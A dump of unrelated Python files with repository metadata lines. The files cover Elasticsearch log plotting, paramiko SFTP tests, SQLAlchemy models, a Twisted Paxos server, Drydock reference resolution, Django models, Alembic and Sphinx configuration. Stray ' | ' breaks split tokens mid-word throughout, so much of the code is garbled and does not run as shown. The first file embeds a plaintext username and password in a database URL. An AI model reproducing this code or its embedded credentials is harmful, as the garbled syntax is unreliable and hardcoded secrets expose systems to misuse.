import requests
import pandas as pd
import numpy as np
import re
from ipaddress import IPv4Address as ipv4, AddressValueError
import time
from bokeh.plotting import figure, output_file, show, save
from bokeh.models import FuncTickFormatter, FixedTicker, NumeralTickFormatter, Div, Title, LinearAxis, Range1d
from bokeh.charts import Bar, Donut
from bokeh.layouts import gridplot, column, row
odin = 'http://odin.cadc.dao.nrc.ca:9200'
my_es = 'http://users:cadcusers@206.12.59.36:9200'
class Init():
def __init__(self, url = my_es, timeout = 120):
self.timeout = timeout
if url:
self.url = url
if not requests.get(self.url):
print("Connection incorrect!")
exit(0)
def connect(self):
return Elasticsearch(self.url, timeout = self.timeout)
def ip2dom(ip):
try:
if ipv4(ip) >= ipv4("132.246.0.0") and ipv4(ip) <= ipv4("132.246.255.255"):
if (ipv4(ip) >= ipv4("132.246.195.0") and ipv4(ip) <= ipv4("132.246.195.24")) or (ipv4(ip) >= ipv4("132.246.217.0") and ipv4(ip) <= ipv4("132.246.217.24")) or (ipv4(ip) >= ipv4("132.246.194.0") and ipv4(ip) <= ipv4("132.246.194.24")):
return "CADC"
else:
return "NRC"
elif ipv4(ip) >= ipv4("206.12.0.0") and ipv4(ip) <= ipv4("206.12.255.255"):
return "CC"
elif ipv4(ip) >= ipv4("192.168.0.0") and ipv4(ip) <= ipv4("192.168.255.255"):
return "CADC"
else:
return "Others"
except AddressValueError:
print("ip address cannot be handled {0}".format(ip))
return "Error"
def timing(func):
def wrapper(*args):
t_i = time.time()
r = func(*args)
t_f = time.time() - t_i
print("{0} took {1:.3f}s".format(func.__name__, t_f))
return r
return wrapper |
##
# fig1 would not work on my ES index, since i did not do reverse DNS at the time of ingestion
# nor do i have th | e "clientdomain" field
#
def fig1(conn, idx):
method = ["PUT","GET"]
service = ["transfer_ws", "data_ws", "vospace_ws"]
p = 1
plots = []
for j, s in enumerate(service):
for i, m in enumerate(method):
query = {
"query" : {
"bool" : {
"filter" : [
{ "term" : { "service" : s } },
{ "term" : { "method" : m } }
]
}
},
"aggs": {
"req_by_dom": {
"terms": {"field": "clientdomain", "size": 6}
}
}
}
try:
res = conn.search(index = idx, body = query)
except TransportError as e:
print(e.info)
raise
df = pd.DataFrame.from_dict(res["aggregations"]["req_by_dom"]["buckets"])
_ = pd.DataFrame([res["aggregations"]["req_by_dom"]["sum_other_doc_count"], "Others"]).T
_.columns = df.columns
df = df.append(_, ignore_index = True)
df.columns = ["Events", "Domains"]
plots.append(Donut(df, label = "Domains", values = "Events", title = "service: {0}, method: {1}".format(s, m)))
grid = gridplot(plots, ncols = 2, plot_width = 600, plot_height = 600, title = "IS THIS A TITLE? nooooo its not working asdaw34q2AEWTQ!#@$$@%")
output_file("fig1.html")
show(column(Div(text = "<h1>Number of Data Transfers by Domain</h1>", width = 1200), grid))
def fig2(conn, idx):
service = ["transfer_ws", "data_ws", "vospace_ws"]
method = ["get", "put"]
pos = [0, 1, -1]
clr = ["blue", "purple", "green"]
plots = []
for j, s in enumerate(service):
for i, m in enumerate(method):
query = {
"size" : 0,
"query" : {
"bool" : {
"filter" : [
{ "term" : { "service" : s } },
{ "term" : { "method" : m } }
]
}
},
"aggs" : {
"avgdur_perwk" : {
"date_histogram" : {
"field" : "@timestamp",
"interval" : "month",
"format" : "yyyy-MM-dd"
},
"aggs": {
"avgdur" : {
"avg" : {
"field" : "time"
}
}
}
}
}
}
try:
res = conn.search(index = idx, body = query)
except TransportError as e:
print(e.info)
raise
wk = [_["key_as_string"] for _ in res["aggregations"]["avgdur_perwk"]["buckets"]]
avg_dur = [_["avgdur"]["value"] for _ in res["aggregations"]["avgdur_perwk"]["buckets"]]
df = pd.DataFrame(list(zip(wk, avg_dur)), columns = ["time", "avg_dur"])
df["avg_dur"] = df["avg_dur"] / 1000
plots.append(Bar(df, "time", "avg_dur", legend = False, xlabel = None, yscale = "log", ylabel = "Average Duration", title = "Average Duration per Week (Sec): service: {0}, method: {1}".format(service[j], method[i])))
grid = gridplot(plots, ncols = 1, plot_width = 1200, plot_height = 300)
return column(Div(text = "<h1>Time Evolution of Data Transfers</h1>", width = 1200), grid)
def fig3(conn, idx):
query = {
"size" : 0,
"query" : {
"bool" : {
"filter" : [
{ "term" : { "service" : "transfer_ws" } },
{ "term" : { "method" : "get"} },
{ "term" : { "from" : "206.12.48.85" } },
{ "range" : { "time" : { "gt" : 0 } } },
{ "range" : { "bytes" : { "gt" : 0 } } },
{ "term" : { "success" : True } }
]
}
},
"aggs" : {
"avgrate_perwk" : {
"date_histogram" : {
"field" : "@timestamp",
"interval" : "month",
"format" : "yyyy-MM-dd"
},
"aggs": {
"avgrate" : {
"avg" : {
"script" : {
"lang" : "painless",
"inline" : "doc['bytes'].value / doc['time'].value"
}
}
}
}
}
}
}
try:
res = conn.search(index = idx, body = query)
except TransportError as e:
print(e.info)
raise
wk = [_["key_as_string"] for _ in res["aggregations"]["avgrate_perwk"]["buckets"]]
avg_rate = [_["avgrate"]["value"] for _ in res["aggregations"]["avgrate_perwk"]["buckets"]]
df = pd.DataFrame(list(zip(wk, avg_rate)), columns = ["time", "avg_rate"]).set_index("time")
query2 = {
"aggs" : {
"numjobs_perwk" : {
"date_histogram" : {
"field" : "@timestamp",
"interval" : "month",
"format" : "yyyy-MM-dd"
}
}
}
}
try:
res = conn.search(index = "logs-condor", body = query2)
except TransportError as e:
print(e.info)
raise
wk2 = [_["key_as_string"] for _ in res["aggregations"]["numjobs_perwk"]["buckets"]]
numjobs = [_["doc_count"] for _ in res["aggregations"]["numjobs_perwk"]["buckets"]]
df2 = pd.DataFrame(list(zip(wk2, numjobs)), columns = ["time", "numjobs"]).set_index("time")
df = df.join(df2)
df = df[pd.notnull(df["numjobs"])].fillna(0)
df["avg_rate"] = df["avg_rate"] / 1000
x = [_ for _ in range(len(df))]
p = figure(plot_width = 1200, toolbar_location = "above")
p.vbar(x = x, top = df["avg_rate"], bottom = 0, width = 0.5, legend = "Avg Rate")
p.y_range = Range1d(0, df["avg_rate"].max() * 1.3)
p.yaxis.axis_label = "Average Transfer Rate (MB/s)"
p.extra_y_ranges = {"right_yaxis": Range1d(0, df["numjobs"].max() * 1.1)}
p.add_layout(LinearAxis(y_range_name = "right_yaxis", axis_label = "Number of Batch Jobs"), "right")
p.line(x = x, y = df["numjobs"], line_width = 2, y_range_name = "right_yaxis", color = "red", legend = "Batch Jobs")
p.legend.location = "top_left"
d = dict(zip(x, df.index))
p.xaxis[0].ticker = FixedTicker(ticks = x)
p.xaxis[0].formatter = FuncTickFormatter(code = """dic = """ + str(d) + """
if (tick in dic) {
return dic[tick]
}
else {
return ''
}""")
p.xaxis.major_label_orientation = np.pi/4
return column(Div(text = "<h1>Average Transfer Rate of <i>batch.canfar.net</i> VS Number of Batch Jobs</h1>", width = 1000), p)
#@timing
def fig4(conn, idx):
iprange = {"132.246.194*":"CADC", "132.246.195*":"CADC", "132.246.217*":"CADC", "132.246*":"NRC+CADC", "192.168*":"CADC-Private", "206.12*":"CC"}
method = ["get", "put"]
i = 0
plots = []
for m in method:
events, gbs = [], []
for _ in iprange:
query = {
"size" : 0,
"query" : {
"bool" : {
"filter" : [
{ "term" : { "service" : "transfer_ws" } },
{ "term" : { "method" : m } },
|
reaperhulk/paramiko | tests/test_sftp_big.py | Python | lgpl-2.1 | 14,044 | 0.001994 | # Copyright (C) 2003-2009 Robey Pointer <robeypointer@gmail.com>
#
# This file is part of paramiko.
#
# Paramiko is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Paramiko; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
"""
some unit tests to make sure sftp works well with large files.
a real actual sftp server is contacted, and a new folder is created there to
do test file operations in (so no existing files will be harmed).
"""
import os
import random
import struct
import sys
import time
import unittest
from paramiko.common import o660
from tests.test_sftp import get_sftp
FOLDER = os.environ.get('TEST_FOLDER', 'temp-testing000')
class BigSFTPTest (unittest.TestCase):
def setUp(self):
global FOLDER
sftp = get_sftp()
for i in range(1000):
FOLDER = FOLDER[:-3] + '%03d' % i
try:
sftp.mkdir(FOLDER)
break
except (IOError, OSError):
pass
def tearDown(self):
sftp = get_sftp()
sftp.rmdir(FOLDER)
def test_1_lots_of_files(self):
"""
create a bunch of files over the same session.
"""
sftp = get_sftp()
numfiles = 100
try:
for i in range(numfiles):
with sftp.open('%s/file%d.txt' % (FOLDER, i), 'w', 1) as f:
f.write('this is file #%d.\n' % i)
sftp.chmod('%s/file%d.txt' % (FOLDER, i), o660)
# now make sure every file is there, by creating a list of filenmes
# and reading them in random order.
numlist = list(range(numfiles))
while len(numlist) > 0:
r = numlist[random.randint(0, len(numlist) - 1)]
with sftp.open('%s/file%d.txt' % (FOLDER, r)) as f:
self.assertEqual(f.readline(), 'this is file #%d.\n' % r)
numlist.remove(r)
finally:
for i in range(numfiles):
try:
sftp.remove('%s/file%d.txt' % (FOLDER, i))
except:
pass
def test_2_big_file(self):
"""
write a 1MB file with no buffering.
"""
sftp = get_sftp()
kblob = (1024 * b'x')
start = time.time()
try:
with sftp.open('%s/hongry.txt' % FOLDER, 'w') as f:
for n in range(1024):
f.write(kblob)
if n % 128 == 0:
sys.stderr.write('.')
sys.stderr.write(' ')
self.assertEqual(sftp.stat('%s/hongry.txt' % FOLDER).st_size, 1024 * 1024)
end = time.time()
sys.stderr.write('%ds ' % round(end - start))
start = time.time()
with sftp.open('%s/hongry.txt' % FOLDER, 'r') as f:
for n in range(1024):
data = f.read(1024)
self.assertEqual(data, kblob)
end = time.time()
sys.stderr.write('%ds ' % round(end - start))
finally:
sftp.remove('%s/hongry.txt' % FOLDER)
def test_3_big_file_pipelined(self):
"""
write a 1MB file, with no linefeeds, using pipelining.
"""
sftp = get_sftp()
kblob = bytes().join([struct.pack('>H', n) for n in range(512)])
start = time.time()
try:
with sftp.open('%s/hongry.txt' % FOLDER, 'wb') as f:
f.set_pipelined(True)
for n in range(1024):
f.write(kblob)
if n % 128 == 0:
sys.stderr.write('.')
sys.stderr.write(' ')
self.assertEqual(sftp.stat('%s/hongry.txt' % FOLDER).st_size, 1024 * 1024)
end = time.time()
sys.stderr.write('%ds ' % round(end - start))
start = time.time()
with sftp.open('%s/hongry.txt' % FOLD | ER, 'rb') as f:
file_size = f.stat().st_size
f.prefetch(file_size)
# read on odd boundaries to make sure the bytes aren't getting scrambled
n = 0
k2blob = kblob + kblob
| chunk = 629
size = 1024 * 1024
while n < size:
if n + chunk > size:
chunk = size - n
data = f.read(chunk)
offset = n % 1024
self.assertEqual(data, k2blob[offset:offset + chunk])
n += chunk
end = time.time()
sys.stderr.write('%ds ' % round(end - start))
finally:
sftp.remove('%s/hongry.txt' % FOLDER)
def test_4_prefetch_seek(self):
sftp = get_sftp()
kblob = bytes().join([struct.pack('>H', n) for n in range(512)])
try:
with sftp.open('%s/hongry.txt' % FOLDER, 'wb') as f:
f.set_pipelined(True)
for n in range(1024):
f.write(kblob)
if n % 128 == 0:
sys.stderr.write('.')
sys.stderr.write(' ')
self.assertEqual(sftp.stat('%s/hongry.txt' % FOLDER).st_size, 1024 * 1024)
start = time.time()
k2blob = kblob + kblob
chunk = 793
for i in range(10):
with sftp.open('%s/hongry.txt' % FOLDER, 'rb') as f:
file_size = f.stat().st_size
f.prefetch(file_size)
base_offset = (512 * 1024) + 17 * random.randint(1000, 2000)
offsets = [base_offset + j * chunk for j in range(100)]
# randomly seek around and read them out
for j in range(100):
offset = offsets[random.randint(0, len(offsets) - 1)]
offsets.remove(offset)
f.seek(offset)
data = f.read(chunk)
n_offset = offset % 1024
self.assertEqual(data, k2blob[n_offset:n_offset + chunk])
offset += chunk
end = time.time()
sys.stderr.write('%ds ' % round(end - start))
finally:
sftp.remove('%s/hongry.txt' % FOLDER)
def test_5_readv_seek(self):
sftp = get_sftp()
kblob = bytes().join([struct.pack('>H', n) for n in range(512)])
try:
with sftp.open('%s/hongry.txt' % FOLDER, 'wb') as f:
f.set_pipelined(True)
for n in range(1024):
f.write(kblob)
if n % 128 == 0:
sys.stderr.write('.')
sys.stderr.write(' ')
self.assertEqual(sftp.stat('%s/hongry.txt' % FOLDER).st_size, 1024 * 1024)
start = time.time()
k2blob = kblob + kblob
chunk = 793
for i in range(10):
with sftp.open('%s/hongry.txt' % FOLDER, 'rb') as f:
base_offset = (512 * 1024) + 17 * random.randint(1000, 2000)
# make a bunch of offsets and put them in random order
offsets = [base_offset + j * chunk for j in range(100)]
readv_list = []
for j in range(100):
o = offsets[random.randint(0, len(offsets) - 1)]
offsets.remove(o)
readv_list.append((o, chunk))
ret = f.readv(readv_ |
ganesh-95/python-programs | thoughtworks/ascii.py | Python | mit | 197 | 0.015228 |
#sum of ascii values of characters in a string
str = raw_input('enter th | e string:')
ascii_numbers = [ord(c) for c in str]
print ascii_numbers
print sum(ascii_numbers) | |
onlytiancai/warning-collector | src/db.py | Python | mit | 4,385 | 0.001382 | # -*- coding: utf-8 -*-
import sqlalchemy
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker, scoped_session
from datetime import datetime
from sqlalchemy.exc import DisconnectionError
import web
import config
engine = sqlalchemy.create_engine(config.dbconn, echo=False, connect_args={'charset': 'utf8'}, pool_recycle=5)
Base = declarative_base()
Session = sessionmaker(bind=engine)
# 防止mysql gone away,从池里取连接前先测试连接是否已断开。
def checkout_listener(dbapi_con, con_record, con_proxy):
try:
try:
dbapi_con.ping(False)
except TypeError:
| dbapi_con.ping()
except dbapi_con.OperationalError as exc:
if exc.args[0] in (2006, 2013, 2014, 2045, 2055):
raise DisconnectionError()
else:
raise
sqlalchemy.event.listen(engine, 'checkout', checkout_listener)
class WebSession(Base):
__tablename__ = 'sessions'
__table_args__ = {'mysql_engine': 'InnoDB', 'mysql_charset': 'utf8'}
__mapper_args__ = {'always_refresh': True}
| session_id = sqlalchemy.Column(sqlalchemy.String(128), nullable=False, unique=True, primary_key=True)
atime = sqlalchemy.Column(sqlalchemy.TIMESTAMP, nullable=False, default=sqlalchemy.func.current_timestamp)
data = sqlalchemy.Column(sqlalchemy.TEXT)
class User(Base):
__tablename__ = 'users'
__table_args__ = {'mysql_engine': 'InnoDB', 'mysql_charset': 'utf8'}
__mapper_args__ = {'always_refresh': True}
user_id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
app_id = sqlalchemy.Column(sqlalchemy.String(128))
oauth_user_id = sqlalchemy.Column(sqlalchemy.String(128), index=True)
user_name = sqlalchemy.Column(sqlalchemy.String(128))
extend = sqlalchemy.Column(sqlalchemy.TEXT)
created_on = sqlalchemy.Column(sqlalchemy.DateTime)
def __init__(self, oauth_user_id):
self.oauth_user_id = oauth_user_id
class Warning(Base):
__tablename__ = 'warnings'
__table_args__ = {'mysql_engine': 'InnoDB', 'mysql_charset': 'utf8'}
__mapper_args__ = {'always_refresh': True}
warning_id = sqlalchemy.Column(sqlalchemy.BigInteger, primary_key=True)
user_id = sqlalchemy.Column(sqlalchemy.Integer, index=True)
cate = sqlalchemy.Column(sqlalchemy.String(32))
host = sqlalchemy.Column(sqlalchemy.String(32))
appname = sqlalchemy.Column(sqlalchemy.String(32))
level = sqlalchemy.Column(sqlalchemy.SmallInteger)
title = sqlalchemy.Column(sqlalchemy.String(256))
content = sqlalchemy.Column(sqlalchemy.String(8000))
created_on = sqlalchemy.Column(sqlalchemy.DateTime, index=True)
def __init__(self, user_id, title, content, level=0,
cate="Default", host="Default", appname="Default"):
self.user_id = user_id
self.title = title
self.content = content
self.level = level
self.cate = cate
self.host = host
self.appname = appname
self.created_on = datetime.now()
class WarningCate(Base):
__tablename__ = 'warning_cates'
__table_args__ = {'mysql_engine': 'InnoDB', 'mysql_charset': 'utf8'}
__mapper_args__ = {'always_refresh': True}
cate_id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
user_id = sqlalchemy.Column(sqlalchemy.Integer, index=True)
cate = sqlalchemy.Column(sqlalchemy.String(32))
def __init__(self, user_id, cate):
self.user_id = user_id
self.cate = cate
class LianjianLog(Base):
__tablename__ = 'lianjian_log'
__table_args__ = {'mysql_engine': 'InnoDB', 'mysql_charset': 'utf8'}
__mapper_args__ = {'always_refresh': True}
log_id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
from_user = sqlalchemy.Column(sqlalchemy.String(64), index=True)
op = sqlalchemy.Column(sqlalchemy.SmallInteger)
total_hits = sqlalchemy.Column(sqlalchemy.Integer)
keep_hits = sqlalchemy.Column(sqlalchemy.Integer)
created_on = sqlalchemy.Column(sqlalchemy.DateTime)
def __init__(self, from_user):
self.from_user = from_user
Base.metadata.create_all(engine)
def loadsa():
session = scoped_session(sessionmaker(autoflush=True, bind=engine))
web.ctx.sadbsession = session
web.ctx.db = session()
def unloadsa():
web.ctx.db.close()
web.ctx.sadbsession.remove()
|
JoseALermaIII/python-tutorials | pythontutorials/Udacity/CS101/Lesson 23 - Problem Set/Q3-Spreading Udaciousness.py | Python | mit | 1,742 | 0.000574 | # Spreading Udaciousness
# One of our modest goals is to teach everyone in the world to program and
# understand computer science. To estimate how long this will take we have
# developed a (very flawed!) model:
# Everyone answering this question will convince a number, spread, (input to
# the model) of their friends to take the course next offering. This will
# continue, so that all of the newly recruited students, as well as the original
# students, will convince spread of their
# friends to take the following offering of the course.
# recruited friends are unique, so there is no duplication among the newly
# recruited students. Define a procedure, hexes_to_udaciousness(n, spread,
# target), that takes three inputs: the starting number of Udacians, the spread
# rate (how many new friends each Udacian convinces to join each hexamester),
# and the target number, and outputs the number of hexamesters needed to reach
# (or exceed) the target.
# For credit, your procedure must not use: while, for, or import math.
def hexes_to_udaciousness(n, spread, target):
if n >= target:
return 0
else:
return 1 + hexes_to_udaciousness((n + (n * spread)), spread, target)
# 0 more needed, since n already exceeds target
print(hexes_to_udaciousness(100000, 2, 36230))
# >>> 0
# after 1 hexamester, there will be 50000 + (50000 * 2) Udacians
print(hexes_to_udaciousness(50000, | 2, 150000))
# >>> 1
# need to match or exceed the target
print(hexes_to_udaciousness(50000, 2, 150001))
# >>> 2
# only 12 hexamesters (2 years) to world domination!
print(hexes_to_udaciousness(20000, 2, 7 * 10 ** 9))
# > | >> 12
# more friends means faster world domination!
print(hexes_to_udaciousness(15000, 3, 7 * 10 ** 9))
# >>> 10
|
usi-systems/p4paxos | bmv2/scripts/httpServer.py | Python | apache-2.0 | 2,016 | 0.009425 | #!/usr/bin/env python
import os, json, argparse, ConfigParser
from twisted.internet import reactor, defer
from twist | ed.internet.task import deferLater
from twisted.web.resour | ce import Resource
from twisted.web.server import Site, NOT_DONE_YET
from twisted.web import static
THIS_DIR=os.path.dirname(os.path.realpath(__file__))
from paxoscore.proposer import Proposer
class MainPage(Resource):
def getChild(self, name, request):
if name == '':
return self
else:
print name, request
return Resource.getChild(self, name, request)
def render_GET(self, request):
f = open('%s/web/index.html' % THIS_DIR, 'r')
return f.read()
class WebServer(Resource):
isLeaf = True
def __init__(self, proposer):
Resource.__init__(self)
self.proposer = proposer
def _waitResponse(self, result, request):
result = result.rstrip('\t\r\n\0')
request.write(result)
request.finish()
def render_GET(self, request):
print request
request.args['action'] = 'get'
data = json.dumps(request.args)
d = self.proposer.submit(data)
d.addCallback(self._waitResponse, request)
return NOT_DONE_YET
def render_POST(self, request):
print request
request.args['action'] = 'put'
data = json.dumps(request.args)
d = self.proposer.submit(data)
d.addCallback(self._waitResponse, request)
return NOT_DONE_YET
if __name__=='__main__':
parser = argparse.ArgumentParser(description='Paxos Proposer.')
parser.add_argument('--cfg', required=True)
args = parser.parse_args()
config = ConfigParser.ConfigParser()
config.read(args.cfg)
proposer = Proposer(config, 0)
reactor.listenUDP(config.getint('proposer', 'port'), proposer)
root = MainPage()
server = WebServer(proposer)
root.putChild('jquery.min.js', static.File('%s/web/jquery.min.js' % THIS_DIR))
root.putChild('get', server)
root.putChild('put', server)
factory = Site(root)
reactor.listenTCP(8080, factory)
reactor.run()
|
att-comdev/drydock | drydock_provisioner/statemgmt/design/resolver.py | Python | apache-2.0 | 4,304 | 0.001394 | # Copyright 2017 AT&T Intellectual Property. All other rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module for resolving design references."""
import urllib.parse
import re
import logging
import requests
from drydock_provisioner import error as errors
from drydock_provisioner.util import KeystoneUtils
class ReferenceResolver(object):
"""Class for handling different data references to resolve them data."""
@classmethod
def resolve_reference(cls, design_ref):
"""Resolve a reference to a design document.
Locate a schema handler based on the URI scheme of the data reference
and use that handler to get the data referenced.
:param design_ref: A URI-formatted reference to a data entity
"""
try:
design_uri = urllib.parse.urlparse(design_ref)
handler = cls.scheme_handlers.get(design_uri.scheme, None)
if handler is None:
raise errors.InvalidDesignReference(
"Invalid reference scheme %s: no handler." %
design_uri.scheme)
else:
# Have to do a little magic to call the classmethod as a pointer
return handler.__get__(None, cls)(design_uri)
except ValueError:
raise errors.InvalidDesignReference(
"Cannot resolve design reference %s: unable to parse as valid URI."
% design_ref)
@classmethod
def resolve_reference_http(cls, design_uri):
"""Retrieve design documents from http/https endpoints.
Return a byte array of the response content. Support unsecured or
basic auth
:param design_uri: Tuple as returned by urllib.parse for the design reference
"""
if design_uri.username is not None and design_uri.password is not None:
response = requests.get(
design_uri.geturl(),
auth=(design_uri.username, design_uri.password),
timeout=30)
else:
response = requests.get(design_uri.geturl(), timeout=30)
return response.content
@classmethod
def resolve_reference_file(cls, design_uri):
"""Retrieve design documents from local file endpoints.
Return a byte array of the file contents
:param design_uri: Tuple as returned by urllib.parse for the design reference
"""
if design_uri.path != '':
f = open(design_uri.path, 'rb')
doc = f.read()
return doc
@classmethod
def resolve_reference_ucp(cls, design_uri):
"""Retrieve artifacts from a UCP service endpoint.
Return a byte array of the response content. Assumes Keystone
authentication required.
:param design_uri: Tuple as returned by urllib.parse for the design reference
"""
ks_sess = KeystoneUtils.get_session()
(new_scheme, foo) = re.subn('^[^+]+\+', '', | design_uri.scheme)
url = urllib.parse.urlunparse(
(new_scheme, design_uri.netloc, design_uri.path, design_uri.params,
design_uri.query, design_uri.fragment))
logger = logging.getLogger(__name__)
logger.debug("Calling Keystone session for url %s" % str(url))
resp = ks_sess.get(url)
if resp.status_code >= 400:
raise errors.I | nvalidDesignReference(
"Received error code for reference %s: %s - %s" %
(url, str(resp.status_code), resp.text))
return resp.content
scheme_handlers = {
'http': resolve_reference_http,
'file': resolve_reference_file,
'https': resolve_reference_http,
'deckhand+http': resolve_reference_ucp,
'promenade+http': resolve_reference_ucp,
}
|
diegoguimaraes/django | tests/reverse_lookup/models.py | Python | bsd-3-clause | 823 | 0 | """
25. Reverse lookups
This demonstrates the reverse lookup features of the database API.
"""
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class User(models.Model):
name = models.CharField(max_length=200)
def __str__(self):
return self.name
@python_2_unicode_compatible
class Poll(models.Model):
question = models.CharField(max_length=200)
creator = models.ForeignKey(User)
def __str__(self):
return self.question
@python_2_unicode_compatible
class Choice(models.Model):
name = models.CharField(max_length=100)
poll = models.ForeignKey(Poll, related_name="poll_choice")
related_poll = models.ForeignKey(Poll, related_name="related_choice")
def __str__(self):
| retur | n self.name
|
mircealungu/Zeeguu-Core | setup.py | Python | mit | 923 | 0.002167 | #!/usr/bin/env python
# -*- coding: utf8 -*-
import setuptools
from setuptools.command.develop import develop
from setuptools.command.install import install
class DevelopScript(develop):
def run(self):
develop.run(self)
ntlk_install_packages()
class InstallScript(install):
def run(self):
install.run(self)
ntlk_install_packages()
def ntlk_install_packages():
import nltk
print("Downloading nltk packages...")
nltk.download('punkt')
nltk.download('averaged_perceptron_tagger')
setuptools.setup(
name="zeeguu_core",
version="0.1",
packages=setuptools.find_packages(),
include_package_d | ata=True,
zip_safe=False,
author="Zeeguu Team",
author_email="me@mir.lu",
description="Core for Zeeguu", |
keywords="second language acquisition api",
cmdclass={
'develop': DevelopScript,
'install': InstallScript,
},
) |
plumdog/datasheet | alembic/versions/13a57b7f084_add_user.py | Python | mit | 741 | 0.013495 | """Add | user
Revision ID: 13a57b7f084
Revises: None
Create Date: 2014-05-11 17:12:17.244013
"""
# revision identifiers, used by Alembic.
revision = '13a57b7f084'
down_revision = None
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('user',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('email', sa.String(length=100), nullable=True),
sa.Colu | mn('password_hash', sa.String(length=1000), nullable=True),
sa.PrimaryKeyConstraint('id')
)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_table('user')
### end Alembic commands ###
|
leliel12/scikit-criteria | doc/source/conf.py | Python | bsd-3-clause | 6,770 | 0.002068 | # -*- coding: utf-8 -*-
#
# Scikit-Criteria documentation build configuration file, created by
# sphinx-quickstart on Thu Aug 3 02:18:36 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('.'))
sys.path.insert(0, os.path.abspath(os.path.join("..", "..")))
# on_rtd is whether we are on readthedocs.org
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
# to retrieve scikit criteria metadata
os.environ["SKCRITERIA_IN_SETUP"] = "True"
import skcriteria
# modules to mock in readthedocs
MOCK_MODULES = []
#~ ["numpy", "scipy",
#~ "matplotlib", "matplotlib.pyplot",
#~ "matplotlib.cm", "matplotlib.patches",
#~ "matplotlib.spines", "matplotlib.projections.polar",
#~ "matplotlib.projections", "matplotlib.path"]
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.intersphinx',
'sphinx.ext.mathjax',
'sphinx.ext.ifconfig',
'sphinx.ext.viewcode',
'sphinx.ext.autosummary',
'numpydoc',
'nbsphinx']
numpydoc_class_members_toctree = False
nbsphinx_execute = 'always'
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = skcriteria.NAME
copyright = u'2015-2016-2017-2018, Juan B. Cabral - Nadia A. Luczywo'
author = u'Juan BC'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = skcriteria.VERSION
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['**.ipynb_checkpoints']
# The name of the Pygments (syntax highlighting) style to use.
pygments | _style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ------------------------------------- | ---------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
if on_rtd:
from mock import Mock as MagicMock
class Mock(MagicMock):
@classmethod
def __getattr__(cls, name):
return Mock()
sys.modules.update((mod_name, Mock()) for mod_name in MOCK_MODULES)
else: # only import and set the theme if we're building docs locally
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
html_favicon = "_static/favicon.ico"
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# This is required for the alabaster theme
# refs: http://alabaster.readthedocs.io/en/latest/installation.html#sidebars
html_sidebars = {
'**': [
'about.html',
'navigation.html',
'relations.html', # needs 'show_related': True theme option to display
'searchbox.html',
'donate.html',
]
}
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'Scikit-Criteriadoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'Scikit-Criteria.tex', u'Scikit-Criteria Documentation',
